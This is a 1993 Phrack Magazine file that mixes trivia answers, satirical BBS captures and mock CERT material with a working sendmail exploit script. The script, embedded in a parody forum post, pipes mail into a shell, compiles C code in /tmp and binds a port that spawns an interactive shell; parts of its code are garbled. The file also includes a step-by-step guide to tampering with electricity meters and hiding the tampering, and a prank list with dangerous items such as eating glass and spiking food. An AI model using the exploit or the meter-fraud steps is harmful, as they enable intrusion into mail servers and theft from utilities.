==Phrack Magazine== Volume Four, Issue Forty-Four, File 3 of 27 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART I ****************************************************************************** PHRACK TRIVIA Last issue I tried something different. I tried to have a little trivia contest, giving away some prizes for the first to get all the answers. Well, I should have known that Phrack's readers are lazy. The amount of you who actually responded was pathetic. The winners are: dFx, Holistic, Damiano & Matt I had planned on 5 winners. Notice how many won. I won't even say how many these guys got right, because noone came close to 100%. Obviously I'm the only trivia buff in the underground. ------------------------------------------------------------------------------- PHRACK TRIVIA ANSWERS 1) CCIS Common Channel Interoffice Signalling 2) Stimpson J. Cat's Roommate is? Ren Hoek 3) Name the cracker. Bill Landreth 4) METAL AE password. KILL 5) Who invented the TeleTrial? King Blotto 6) Name Bloom County's hacker. Oliver Wendell Jones 7) What was the Whiz Kids' computer named? RALF 8) Western Union owned what long distance service? MetroPhone 9) What computer read both Apple ][ and IBM PC disks? The Franklin ACE 10) Who made the "Charlie" board? John Draper 11) How many credits for a CNE? 19 12) What was in the trunk of the Chevy Malibu? Dead Aliens 13) Name three bands A. Jourgensen had a hand in. Ministry, Revolting Cocks, Skatenigs, Pailhead, Lard, (etc.) 14) SYSTEST Password: UETP 15) What computer makes the best Sim Stim decks? Ono-Sendai 16) What magazine brought the telephone underground to national attention in 1971? Esquire 17) What is the significance of 1100 + 1700 hz? KP 18) What magazine was raided for publishing black box plans? Ramparts 19) What BBS raid spawned the headlines "Whiz Kids Zap Satellites" ? The Private Sector 20) CLASS Custom Local Area Signalling Services 21) What computer responds "OSL, Please" ? NT SL-1 22) RACF secures what OS? MVS 23) The first person to create a glider gun got what? $50.00 24) QRM Interference from another station or man-made source 25) PSS Packet Switch Stream 26) What PSN was acquired by GTE Telenet? UniNet 27) 914-725-4060 OSUNY 28) April 15, 1943 Discovery of LSD 29) 8LGM 8-legged Grove Machine 30) WOPR War Operations Planned Response 31) What happened on March 1, 1990? Steve Jackson Games Raided By Secret Service 32) Port 79 Finger 33) Who starred in the namesake of Neil Gorsuch's UNIX security mailing list? Sean Connery 34) What Dutch scientist did research in RF? Van Eck 35) What was the author of GURPS Cyberpunk better known as? The Mentor 36) Who would "Piss on a spark plug if he thought it would do any good?" General Berringer 37) What thinktank did Nickie Halflinger escape from? Tarnover 38) NCSC National Computer Security Center 39) Who is Pengo's favorite astronomer? Cliff Stoll 40) What language was Mitnik's favorite OS written in? BLISS 41) Abdul Alhazred wrote what? The Necronomicon 42) The answer to it all is? 42 43) Who is the father of computer security? Donn B. Parker 44) Who wrote VCL? Nowhere Man 45) What kind of computer did Cosmo have? A Cray 46) Hetfield, Ulrich, Hammet, Newstead Metallica 47) What company wrote the computer game "Hacker?" Activision 48) Who does Tim Foley work for? US Secret Service 49) Who played Agent Cooper? Kyle MacLachlan 50) Vines runs over what OS? AT&T Sys V. UNIX 51) Mr. Peabody built what? The Way-back Machine 52) Who makes SecurID? Security Dynamics 53) What's in a Mexican Flag? White Tequila, Green Creme de Menthe & Grenadine, layered 54) Who created Interzone? William S. Burroughs 55) JAMs (as led by John Dillinger) Justified Ancients of MU 56) Abbie Hoffman helped start what phreak magazine? YIPL 57) What was once "Reality Hackers?" Mondo 2000 58) Gates and Allen "wrote" BASIC for what computer? The Altair 59) Tahoe is related to what OS? BSD Unix 60) CPE 1704 TKS is what? Launch Code from Wargames 61) Telemail's default was what? A 62) "Do Androids Dream of Electric Sheep" became what? Blade Runner 63) What broadcasts between roughly 40 and 50 mhz? Cordless Phones 64) Who created Tangram, Stratosphere, and Phaedra among others? Tangerine Dream 65) What was Flynn's most popular video game? Space Paranoids 66) Who lived in Goose Island, Oregon? Dr. Steven Falken 67) 516-935-2481 Plovernet 68) What is the security of ComSecMilNavPac? 9 69) What has the "spiral death trap?" Qix 70) Who was the Midnight Skulker? Mark Bernay 71) TMRC Tech Model Railroad Club 72) Who wrote "Jawbreaker?" John Harris 73) 213-080-1050 Alliance Teleconferencing, Los Angeles 74) What is the Tetragrammaton represented as? YHVH (or IHVH) 75) Who is Francis J. Haynes? Frank (of the Phunny Phone Call fame) 76) Who ran into one of the Akira test subjects? Tetsuo Shima 77) What had "Munchies, Fireballs and Yllabian Space Guppies?" Stargate 78) PARC Palo Alto Research Center 79) Alex and his droogs hung out where? The Korova Milk Bar 80) Jane Chandler in DC's "Hacker Files" is based on who? Gail Thackeray 81) The Artificial Kid lives on what planet? Reverie 82) 208057040540 QSD 83) What are the two most common processors for cellular phones? 8051 & 68HC11 84) Who came up with the term "ICE?" Tom Maddox 85) What group is hoped might help the "Angels" contact RMS? The Legion of Doom 86) Who is Akbar's friend? Jeff 87) What company's games was David Lightman after? Protovision 88) 26.0.0.0 NET-MILNET 89) Who was Mr. Slippery forced to locate? The Mailman 90) Who is "The Whistler?" Joe Engressia 91) What use would a 6.5536 crystal be? Making a red box 92) .--. .... .-. .- -.-. -.- PHRACK 93) The Dark Avenger likes what group? Iron Maiden 94) What book spawned the term "worm?" The Shockwave Rider 95) Michael in "Prime Risk" wanted money for what? Flying Lessons 96) Automan's programmer worked for who? The Police Department 97) What signal filled in keystrokes on TOPS-20? ESC 98) ITS Incompatible Time-sharing System 99) (a/c)+121 Inward Operator 100) What drug kept the scanners sane? Ephemerol Bonus 1 3 pts Name three bodies of work by Andrew Blake? Night Trips Night Trips 2 Hidden Obsessions Secrets (etc.) Bonus 2 3 pts Name three currently available titles with Norma Kuzma. Fast Food Not of This Earth Cry Baby Laser Moon (etc.) Bonus 3 4 pts Why would I hate Angel Broadhurst? Because he was living with Christina Applegate. (Duh) ******************************************************************************* ** PHRACK MAGAZINE NEEDS THE FOLLOWING ** Any Storage Device Capable of Writing ISO-9660 Format + Software (IE: Personal ROM-Writer, Pinnacle Optical Drive, MicroBoard) A Flatbed 24-Bit Color Scanner SCSI Hard Drives 486 or Pentium Processors SGI Indy/Indigo/Crimson/Iris/Challenge II/Onyx (Any would do) Spectrum Analysis Equipment Oscilloscopes Horizontal & Vertical Sync Adjustment Equipment Miscellaneous Ham Radio Equipment Any donations will be generously rewarded with k-rad info and huge amounts of good karma. ** PHRACK MAGAZINE DOESN'T REALLY NEED BUT KINDA WOULD LIKE THE FOLLOWING ** The Drew Barrymore Home Video (The Motel One) The Christina Applegate "Home Video" (The Poker One) Xuxa's "Early" Films Howard Stern's "Banned by the FCC" CD Jennie Garth's Workout Tape The European Smut Mag with Alissa Milano in it. ******************************************************************************* [Something very humorous I found on the FireWalls List] A one-act play Dramatis Personae: Perry Metzger (PM): an AVP responsible for the firewall at a Fortune 100 company. Joe Cert (JC): A person at CERT supposed to be helping. [The scene opens to Perry on the phone with Joe Cert. Perry is at work and freaking out because he doesn't run Sun sendmail and doesn't know what to do. If he turns off mail, his users will kill him. He has no idea how many machines he has to fix or if he has a problem at all.] PM: Well, I have the problem that I don't normally run Sun sendmail, and I can't run it, so I need to know enough that I can figure out how to fix my security problem. JC: Well, we don't have a procedure to tell people anything beyond what we put in the advisory. PM: I run the gateway for a firm that trades hundreds of billions of dollars a day in the financial markets. We can't afford do get shut down. Isn't there any way you can tell me anything that can help me? JC: Well, we really don't have a procedure in place. PM: I see. Can I ask you some questions? JC: Sure. PM: So this problem, would it be fixed if I had the Prog mailer turned off on my machines? JC: Well, its a problem that will allow people to run programs on your machine. PM: Yes, but would turning off the Prog mailer fix it? JC: Well, the problem allows people to run programs on your machine. PM: I see. Will this problem only hurt machines that have direct TCP access to the internet, or are machines that can get mail indirectly also possibly affected? JC: The hole is exploited by sending mail to the machine. PM: Yes, but do you need SMTP access to the machine, or will just being able to send mail to it hurt you? JC: Well, the hole is exploited by sending mail to the machine. PM: look, the machine on my firewall can't be telneted to. Does that make me safe? JC: Well, the hole is exploited by sending mail to the machine. PM: Listen, I have THREE THOUSAND workstations in a dozen cities on three continents. Are you telling me that I have to tell all my people that they are working the weekend installing a new sendmail on every machine in the firm? I don't even know how to test to see if I've fixed the problem once I've done that! JC: Well, the whole is exploited by sending mail to the machine. PM: Can't you tell me any details? JC: We really don't have a procedure for that. PM: Do you know what the problem is? JC: I can reproduce it, yes. PM: Look, I work for a company with REAL MONEY on the line here. I can get you a letter from a managing director telling you that I'm legit. You can check who we are in any newspaper -- we're one of the largest investment banks in the world. Every day the Wall Street Journal lists the Lehman Brothers T-Bond Index on page C-1. You can check my criminal record -- hell, the SEC makes you get fingerprinted so many times around here that I've still got ink on my fingers from the last time. Can't you give me some help here? JC: We really don't have a procedure for doing that. I'm taking notes, though, and I'll tell my management of your concerns. [He continues in this vein, but eventually, our hero gives up, realizing that CERT is part of the problem, not the solution. All they've succeeded in doing is keeping him up at night. He can't fix his problem, since he doesn't know how. He has no idea if he has a problem. He can't check once he's done something to determine if he's fixed it. All he knows is that CERT has no procedure for telling him anything regardless of who he is, period.] PM: So what you are telling me is that if I want details I have to subscribe to 2600 Magazine? JC: We don't have a procedure for giving you more information, no. PM: I'm sure the crackers will be happy to hear that. They are likely telling each other at a nice high speed. ******************************************************************************* IF SECURITY TYPES WERE K-RAD PART II SecurNet BBS Captures (From the LODCOM BBS Archive Project) ------------------------------------------------------------------------------ Number :) 214 From :) Uncertain Future Subject :) Get a life Hey All, Everyone out there who keeps calling up the Hotline begging for BUGS can just get a life. If you have to ask, you don't deserve to know. UnCERTian Future [A]uto reply [N] [R]e-read [Q]uit:N Number :) 215 From :) Spaf Master Subject :) ... Rum0r haz 1t that a p13cE 0f sH1t hAqu3r Nam3d Sk0tt ChaZ1n iz 0n Th3 F1RST l1zt!*&@$ 3yE hAv3 Try3D 2 g3t h1m Rem0v3D ButT n0-1 0N th3 l1sT w1lL d3w 1t!! Y Kan'T w3 d0 s0meth1ng aB0uT tHeze pr1ckz? 1 r3MeMb3r a dAy Wh3n 1t 0nLy t0oK a PhAx thR3at3n1nG 2 3nD mY sUpP0rT w0ulD g3t a CumSek Haqu3r lyK3 ChaZ1n R3m0v3D!@!# Sh1T! --spaf Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 216 From :) Zen Subject :) Who died and left you in charge? You suck Jeanie. Who said YOU got to be the master? Your group sucks too. You have obsolete info. You guys say "There is nothing you have that we can not possess?" Well, there is nothing you have that WE want to possess. I think I will begin shooting off my mouth at Usenix Security BOFs and in Risks and in mailing lists, then maybe I can be as ELEET as you. NOT! Zen Legion of Security Types [A]uto reply [N] [R]e-read [Q]uit:N Number :) 217 From :) Hackman Subject :) I Dream of Geneie Yo Yo Yo... I think someone wants to be the next Donn Parker. Similarities: 1) Has BIG mouth 2) Writes Worthless Books 3) Hoardes inpho from invisible enemy 4) Goes on and on about "Evil Crackers" You should start charging 5000+ dollar speaking fees and shave your head. THEN, maybe someone will hire your worthless self, and you can emerge from Academia into the REAL world. Nah...you are too LAME! HACKMAN Legion of Security Types [A]uto reply [N] [R]e-read [Q]uit:N Number :) 218 From :) American Eagle Subject :) hey. You two punks think you are so kool, don't you? I was developing security theory when you were in junior high. You need to get your asses kicked, and I'm the guy to do it. About my speaking fees...Youre jealous. See green often? You wish your k-rad companies (pffft) would pay you as well. BAH. AE /q . \s end/ stop , [A]uto reply [N] [R]e-read [Q]uit:N Number :) 219 From :) Captian VAX Subject :) New BBS Hello, I am putting up a new bbs to be a forum for a database on bugs and security problems. If you are interested, please send me email on here or on internet. Thx CV [A]uto reply [N] [R]e-read [Q]uit:N Number :) 220 From :) The BeanCounter Subject :) STUPH HEY...I AM NOT SURE BUT I THINK MY ACCOUNT AT DOCKMASTER HAS BEEN HACKED OUT. IF ANY1 KNOWS WHO DID IT LET ME KNOW. I AM REALLY PISSED! THATS WHAT HAPPENS WHEN PEOPLE GET SLOPPY AND THEY LET ON JUST ANYONE WHO CAN FILL OUT THE FORM! CAN WE LIE DOWN WITH DOGS AND EXPECT NOT TO GET UP WITH FLEAS? WHM [A]uto reply [N] [R]e-read [Q]uit:N Number :) 221 From :) Spaf Master Subject :) fUq U alL 33t sh1T u Pr1Kz!#!$@ 3yE m M0r3 3l33t thAn alL 0f u!!! U w1lL All F3el mY wRatH! Ey3 Hav3 ur InPh0!@$@ 1 w1Ll b3 kaLl1nG 3aCh 0f U v3Ry so()n. --spaf Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 222 From :) Venom Subject :) Fuck! Now I'm mad. That bastard Chasin posted the Sendmail Bug on The firewalls list! Now all the hackers will have it! I'm going to take him down. Anyone who wants to help, his site is crimelab.com. You can check the Forum's Codeline for further developments. Get your scripts ready! Let's hack the little prick! Venom [A]uto reply [N] [R]e-read [Q]uit:N Number :) 223 From :) American Eagle Subject :) Sendmail What is the sendmail bug? AE [A]uto reply [N] [R]e-read [Q]uit:N Number :) 224 From :) Uncertian Future Subject :) Sendmail The Sendmail bug is a bug that works using sendmail. This bug works on hosts using sendmail and can allow people to do things from remote through sendmail. I know the bug, but I'm not going to give it out. Forum Members can get it from the Database on CertNet. UnCERTian Future [A]uto reply [N] [R]e-read [Q]uit:N Number :) 225 From :) The BeanCounter Subject :) SENDMAIL ED: I DON'T HAVE ACCESS TO THE DATABASE ON CERTNET. COULD YOU SEND IT TO ME IN EMAIL? WHM [A]uto reply [N] [R]e-read [Q]uit:N Number :) 226 From :) Uncertian Future Subject :) Bill... Yes, you do. All Members of The Forum have access. I will call you and tell you how to access it. Remember, UNIX is case sensitive. If this is a problem, you will have to use another computer. UnCERTian Future Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 227 From :) Information Warrior Subject :) InterNuts I have been having a really dumb conversation on the net with a moron who wants to argue about HERF with ME! WITH ME! Can you believe it? I almost want to strangle the guy. Some college kid, but still... The new file is due out soon. I will place it in the upload section in .zip format. Someone will have to unzip it for Donn and Bill. I don't think they have figured that utility out yet. [A]uto reply [N] [R]e-read [Q]uit:N Number :) 228 From :) Hackman Subject :) Sendmail Bug. Dig it. You Forum people piss me off. Turn on your buffers everyone cuz here comes the bug. Fuck you if you don't like it. ------Cut Here-------- #!/bin/sh # Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com) # # This material is copyrighted by Scott Chasin, 1992, 1993. The # usual standard disclaimer applies, especially the fact that the # author is not liable for any damages caused by direct or indirect # use of the information or functionality provided by this program. # # Description: # # Exploit NEW sendmail hole and bind a port so we can spawn a program. # Not for distribution under any circumstances # # Usage: smail # default: smail <7001> port=$3 user=$2 cmd=$4 if [ -z "$2" ]; then user=daemon fi if [ -z "$3" ]; then port=7002 fi if [ -z "$4" ]; then cmd="/bin/csh -i" fi ( sleep 4 echo "helo" echo "mail from: |" echo "rcpt to: bounce" echo "data" echo "." sleep 3 echo "mail from: $user" echo "rcpt to: | sed '1,/^$/d' | sh" echo "data" echo "cat > /tmp/a.c < #include #include #include #include reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac; int **av;{struct sockaddr_in mya;struct servent *sp ;fd_set muf;int myfd,new,x,maxfd=getdtablesize(); signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM, 0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr, sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp")) ==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port =htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd, (struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd, 1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if (select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork() ==0){for(x=2;x Why did I take this job? L.O.S.T Girl Number :) 231 From :) American Eagle Subject :) That post How do you use that bug? I tried typing it in,but got a lot of errors. Is it for some special operating system? Or do you have to type it in on a special port? American Eagle Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 232 From :) Zen Subject :) New Program The new version of COPS is available for Download. Zero Day Ware! Get it fast. I will u/l updates/ bug fixes later... Gotta love all them filepoints! Off to play Xtank Zen Legion Of Security Types [A]uto reply [N] [R]e-read [Q]uit:N Number :) 234 From :) Spaf Master Subject :) !@!# Ur Pr0grA/\/\ 1z amUz1nG, But Un3l3eT Eye p0Ss3z 1 0F mUch gR3aTr aB1liTy thAt Th3 4-m w1lL Us3. Ch3Ck th3 DatAbaS3 0n CERT-NET. D3aTh 2 LOST --spaf Forum Of OverLordS Number :) 235 From :) Sysop Subject :) WARNING! Someone has given out the NUP. Some cracker type has attempted to access the bbs as of last night. I will call UnCERTain Future to put out an advisory on this issue. Please do not give out the NUP to anyone. THIS IS A PRIVATE BBS! [A]uto reply [N] [R]e-read [Q]uit:N End of Messages [A]uto reply [N] [R]e-read [Q]uit:Q ******************************************************************************* ============================================================================= CA-93:16 CERT Advisory October 23, 1993 Hacker/Cracker Vulnerabilities ----------------------------------------------------------------------------- The CERT Coordination Center has learned of several vulnerabilities in the language used on the USENET system. This vulnerability affects all users running rn, tin or other USENET news readers as well as users holding discussions containing the words "hacker" or "cracker". Patches can be obtained from your local phrack archive as well as through anonymous FTP to they ftp.netsys.com (192.215.1.2) system. Information concerning specific patches is outlined below. Please note that phrack sometimes updates patch files. If you find that the checksum is different, please contact phrack. ----------------------------------------------------------------------------- I. Hack and Crack Vulnerabilities These vulnerabilities affect all systems running a USENET news- reader including rn and tin, as well as all conversations, papers and stories involving the words "Cracker" and/or "Hacker". ** This vulnerability is being actively exploited and we strongly recommend that sites take immediate and corrective action. ** A. Description A vulnerability exists in the words "Hacker" and "Cracker" such that users may become confused as to exactly who/what you are talking about when used in a sentence. B. Impact Unauthorized confusion to affected conversations may ensue. C. Solution We recommend that all affected sites take the following steps to secure their systems. 1. Obtain and install the appropriate patch following the instructions included with the patch. System Patch ID Filename Checksum ------ -------- --------------- --------- all 10288 10288.tar.Z 5551 212 The checksums shown above are from the BSD-based checksum. 2. If your conversation is found to have been compromised by the word "Hacker" or "Cracker", we recommend you flame all parties involved and immediately break up the discussion by talking about the "correct" meaning of the words. 3. Depending upon the sensitivity of the information contained in your conversation, you may wish to replace the existing conversation with one discussing (a) the NSA, (b) the BATF (c) The Kennedy Assasination, (d) why shadowing password schemes are helpful or hurtful or (e) which file editor is actually the best. --------------------------------------------------------------------------- The CERT Coordination Center wishes to thank the Rogue Agent, (Rogue Agent/ SoD!/TOS/KoX), the letter 'Q' and the number '55' for reporting these vulnerabilities and Phrack, Inc. for their response to these problems. --------------------------------------------------------------------------- If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in FIRST (Forum of Incident Response and Security Teams). Internet E-mail: cert@cert.org Telephone: 412-268-7090 (24-hour hotline) CERT personnel answer 8:30 a.m.-5:00 p.m. EST(GMT-5)/EDT(GMT-4), and are on call for emergencies during other hours. CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 Past advisories, information about FIRST representatives, and other information related to computer security are available for anonymous FTP from cert.org (192.88.209.5). ******************************************************************************* [** NOTE: The following file is presented for informational and entertainment purposes only. Phrack Magazine takes NO responsibility for anyone who attempts the actions described within. **] Power to the People A little theory to get you started: Watts=Current * Voltage A power meter consists of a voltage coil, a current coil, a small motor to drive the dials, and little else. Given the formula above, if we can somehow cut down the voltage that the meter 'sees', then we can reduce the number of watts that it measures. If we cut our voltage in 1/2, our watts also get cut in half. Fortunately, your meter doesn't read the voltage directly off of the lines into your house. Two small wires lead to the voltage coil within the meter. Simple modification to this circuit is all that is needed. Inserting a resistor in series with the voltage coil will cut the voltage that the meter sees, and therefore that wattage that it reads. Meters read Kilowatts per hour, and you pay so much for each kilowatt. Since the hours remain constant (unless your stuck in one of those nasty little dimensional time warps..and I really hate it when that happens), your bill is directly related to what resistor value you insert. Do this correctly, and carefully, you will save a bundle on the power you use. Say I cut my bill by $40 per month..$40 * 12 months = $480 saved with a original 'investment' of $5 that is a 96 fold return on your investment. This idea also might be used to provide a service to your trusted friends, $100 bux a mod or so..$$$ One last little caution before you begin, don't go messing around with the adjustment screws you will find, usually there are 2 of them with F & S marked near them. I had the foolish idea to mess with these, the result is when I am drawing very little power (a few watts) my meter will slowly run backwards. Next time I'm modifying it, I'll have to fix that. Mr. Meter Reader would really wonder what the heck was going on when he saw that. (Mr. Meter Reader will be thinking he's done far to many drugs on the weekend..or needs to be.) SUPPLIES NEEDED: (2) Power meters. You'll perform the mod on one, and use the other to have in while you're doing it. (1) Length of heat shrink tubing, a sufficient size to cover a half watt resistor. (Some) half-watt resistors, 10k-25k or so. (A 10K resistor will cut your bill in half...15K quit a bit more (the amount saved, is NOT linear to the resistor value..more like a logarithmic scale) (some) Good old 100% silicon caulk Soldering iron, solder, lots of nerve. To begin the Mod: Take the little 'lock' they use (little plastic deal), and chuck it. Wait about 2 months for the reader to get used to the fact it's gone..the idea is that if they think you've tampered with it cause the lock is gone..they will check and find no tampering then..(least that's the idea) If you happen to know someone who works for the power company, and can get your hands on some of those locks, get a few new ones, and let them 'age' outside for a few months (to get that used look), then replace yours with it when done. And if anyone happens to know of a source for these locks, I would appreciate knowing. You'll need to 'find/get/steal/snag/etc' another meter to put in while your fixing your..(kinda hard to see/solder with no power) ;) Lift the now unlocked cover and pull meter out..(simply pulls out of the socket real easy) put other meter in for a while..(do at night would be a good idea..neighbors would wonder what the heck you were doing eh?) On the side of the meter, there will be a little (probably copper), pin, that is designed to break when you unbend the end of it..(security device). Be real careful and try not to break it when you bend it back (if it breaks, save the piece that broke off) Pull that out, and then turn the ring that holds the unit together..it should then come apart real easy. Between the assembly where the wheel is and the base plate, look in the gap, there should be a black deal that looks like a transformer attached to the core of the meter and 2 black wires leading from the prongs of the meter base to the smaller coil. This is the voltage coil. Here comes the fun part! Cut one of the wires, being sure you cut where you can hide the damage later. Solder in 10k or 15k resistor with the leads of resistor cut off right at resistor body, and also put the heat shrink tubing on the resistor, and shrink it..(with heat preferably) ;) Take silicone rubber (the 100% pure stuff..) and glue the resistor and the shrunk tubing over it underneath the top assembly. Make it appear that the wires simply curve up that way and nothing more. Put ring back on. Notice that you must put the meter together exactly the way it came apart. Example: on mine, i noticed that there was dirt on the bottom from rain splashing mud onto the meter. It would look kinda obvious if the mud suddenly appeared on top of the meter. Take the little pin that you removed (copper thing) and replace it in the hole and through the ring as before. Bend the end back up like before also if it broke, bend what is left anyways, there should be plenty left to bend. Take the broken end (if it broke), and jam it under the end of the bend to make it look legit. If they do pull the meter to inspect, they will hopefully just think that it might have broke loose when it was installed. I have noticed on some unmodified meters that I 'found' that the security pin has been broken already. So It's reasonable safe to assume that they don't take much faith in them. When done, you should NOT be able to tell if any mods have been done by looking. Be sure it's undetectable, they get kinda mad when you do things like this for some odd reason. It's suggested that after the modification, you have a friend, who you trust not to fink, take a very close look to see if they can spot any mods. Your bill should drop in half or more..if you really want to drop the bill..do this in steps.. a few months apart..so they won't notice that your bill is dropping like a rock. Just don't get silly. Using only 1kwh per month just yells fraud. Mine went from $80-$90 a month to around $30-$37 month with a 10K resistor (I added a electric dryer and other items during that month also.) You might want to try this a few times on other meters you've 'found' just to get the nack of it first, it should work with all meters. At least the ones they use in my area. Table of comparisons: test made using 1320 watt electric heater. 120V 11 amps 1.3 KWH resistor value rev per time voltage cross resistor rev/hour ------------------------------------------------------------------------------ 0 1 rev/23 seconds 0 156 1k 1 rev/24 seconds 9. 150 10K 1 rev/42 seconds 63 85 12k 1 rev/53 seconds 68 39K 1 rev/464 seconds ??? 7.25 Notice the 39K resistor's performance, NOT a good choice to use, it will cut your bill to 4% of the original. They will wonder about this. I'm currently using 10K which will cut it to approx 54% of the original bill. My bill is around 1/2 previous. Saving me approx $30-$50 a month in power bills. Not bad for a 10 cent resistor. Keep in mine the wattage rating of the resistor. Measure the voltage across the resistor. Take that number divide it by the resistor your using to get current. Take the current times current (square it), and multiply this by resistance value to get the wattage of resistor that is required. After all, it would not be a good thing for the resistor to go up in smoke. Mr. Meter Reader would wonder why you used 0 kwh this month. There also is another method that in theory will make your power bill less, this is called 'power factor correction', but unfortunately requires the use of some rather large (read expensive) AC cap's. For this reason (and the fact it cost under $5 and provides more of a benefit), the method of using the resistor is more useful and do-able by the everyone (especially those who despise the 'system'). Notice that I have NOT left a email address or the like for correspondence, namely due to the fact that this is highly illegal and greatly frowned upon by the authorities. If anyone has a need to contact me they may do so via phrack magazine, they can forward mail to me. If you do this modification correctly and per instructions, you will indeed save money. Have fun, be careful, and challenge the system at every turn. ******************************************************************************* DATA BANK OF THE GERMAN SPEAKING AN-ARCHISM The Da.d.A. Project DAtenbank des Deutschsprachigen Anarchismus Berlin, Koln The history of the liberative movement has not yet been filed sufficiently. That is, mainly, due to the lack of scientists with interest in exploring this area. Thanks to that, people who need bibliographic information for some specific themes of the history of anarchism, must go through all direct sources and derive from those some conclusions. Things are more difficult in case modern literature is required, for the theory and practice of liberative movements, which have appeared in the meantime. The data bank of the German speaking anarchism (DAtenbank des Deutschsprachigen Anarchismus) is trying to cover the lack of bibliographic material. Currently it files anarchistic or, generally, liberative documents and publishes. Later it will comprehend documents which deal with the history and theory of those movements. We are focusing our compilation activities, to the German speaking areas with plans of enhancing that shortly. In parallel we are elaborating an introduction to the publishing history of the printed material, which will be informative for their political and editorial meanings. From the early 1980's, the filing of the German liberative press is open for exploration. It covers the chronological period from the philosophic commencements of the German anarchism, in the 1832, until nowadays. Strength of expression is given to newspapers and magazines, though collections of documents, almanacs, year-books, congresses' protocols and catalogs are not omitted. Except of the anarchistic publishes we are also registering material whose cooperatives or publishers were anarchists. The filing is achieved using all the usual bibliographical criterion (titles, publishers, date/district, circulation, place of distribution et cetera). In order to handle the increasing demands of the people who would like to access our material, we decided to publish our first synthetic registers in a series of brochures. This publication, in restricted copies and four or five continuations, will be available at the "File of Social and Civilization History" of the 'Libertad' publications in Berlin. The first brochure, is occupied with the German liberative press from 1832 to 1890. Every copy of this serial includes a diagram of the press' history, chronological bibliography of the magazines and an index. We resume special researches through the data bank and we offer the results printed. Until now we have filed over 1000 titles, which offer many different elements for research each. Da.d.A. is a private, research project. We do not accept donations from state institutions and other similar organizations. In that way we can continue our efforts undistracted and independent. The disadvantage is that we support Da.d.A. with personal expenses and when we have free time available. The modern liberative press is difficult to register and get filed. Although liberative publications were developed in an unprecedented way (and not only arithmetically) after 1968, few publications are accessible from libraries and files. Especially today we must tune up our practises in order to protect modern press. We encourage every publisher of anarchistic material, even if productions are ceased nowadays, to send us information and, if possible, a copy of their publications. They will get registered in our computer and filed in the library for the Research of Social Demands, in order to be accessible for studies in the future. For more information about the Da.d.A. project and the possibilities of using the data bank, you can contact us in the following addresses: BERLINER GESELLSCHAFT ZUM STUDIUM SOZIALER FRAGEN e.V. Projekt: Datenbank des Deutschsprachigen Anarchismus (Da.d.A.) c/o Jochen Schmuck c/o Gunter Hoering Postfach 440 349 Pfalzer Str.27 1000 BERLIN 44 5000 KOLN 1 Tel. 030/686 65 24 Tel. 0221/21 81 49 ******************************************************************************* [Don't ask me why I'm printing this. I just think it's funny as hell.] 100 WAYS TO FREAK OUT YOUR ROOMMATE 1. Smoke jimson weed. Do whatever comes naturally. 2. Switch the sheets on your beds while s/he is at class. 3. Twitch a lot. 4. Pretend to talk while pretending to be asleep. 5. Steal a fishtank. Fill it with beer and dump sardines in it. Talk to them. 6. Become a subgenius. 7. Inject his/her twinkies with a mixture of Dexatrim and MSG. 8. Learn to levitate. While your roommate is looking away, float up out of your seat. When s/he turns to look, fall back down and grin. 9. Speak in tongues. 10. Move you roommate's personal effects around. Start out subtle. Gradually work up to big things, and eventually glue everything s/he owns to the ceiling. 11. Walk and talk backwards. 12. Spend all your money on Jolt Cola. Drink it all. Stack the cans in the middle of your room. Number them. 13. Spend all your money on Transformers. Play with them at night. If your roommate says anything, tell him/her with a straight face, "They're more than meets the eye." 14. Recite entire movie scripts (e.g. "The Road Warrior," "Repo Man," Casablanca,") almost inaudibly. 15. Kill roaches with a monkey wrench while playing Wagnerian arias on a kazoo. If your roommate complains, explain that it is for your performance art class (or hit him/her with the wrench). 16. Collect all your urine in a small jug. 17. Chain yourself to your roommate's bed. Get him/her to bring you food. 18. Get a computer. Leave it on when you are not using it. Turn it off when you are. 19. Ask your roommate if your family can move in "just for a couple of weeks." 20. Buy as many back issues of Field and Stream as you can. Pretend to masturbate while reading them. 21. Fake a heart attack. When your roommate gets the paramedics to come, pretend nothing happened. 22. Eat glass. 23. Smoke ballpoint pens. 24. Smile. All the time. 25. Collect dog shit in baby food jars. Sort them according to what you think the dog ate. 26. Burn all your waste paper while eying your roommate suspiciously. 27. Hide a bunch of potato chips and Ho Hos in the bottom of a trash can. When you get hungry, root around in the trash. Find the food, and eat it. If your roommate empties the trash before you get hungry, demand that s/he reimburse you. 28. Leave a declaration of war on your roommate's desk. Include a list of grievances. 29. Paste boogers on the windows in occult patterns. 30. Shoot rubber bands at your roommate while his/her back is turned, and then look away quickly. 31. Dye all your underwear lime green. 32. Spill a lot of beer on his/her bed. Swim. 33. Bye three loaves of stale bread. Grow mold in the closet. 34. Hide your underwear and socks in your roommate's closet. Accuse him/her of stealing it. 35. Remove your door. Ship it to your roommate's parents (postage due). 36. Pray to Azazoth or Zoroaster. Sacrifice something nasty. 37. Whenever your roommate walks in, wait one minute and then stand up. Announce that you are going to take a shower. Do so. Keep this up for three weeks. 38. Array thirteen toothbrushes of different colors on your dresser. Refuse to discuss them. 39. Paint your half of the room black. Or paisley. 40. Whenever he/she is about to fall asleep, ask questions that start with "Didja ever wonder why...." Be creative. 41. Shave one eyebrow. 42. Put your mattress underneath your bed. Sleep down under there and pile your dirty clothes on the empty bedframe. If your roommate comments, mutter "Gotta save space," twenty times while twitching violently. 43. Put horseradish in your shoes. 44. 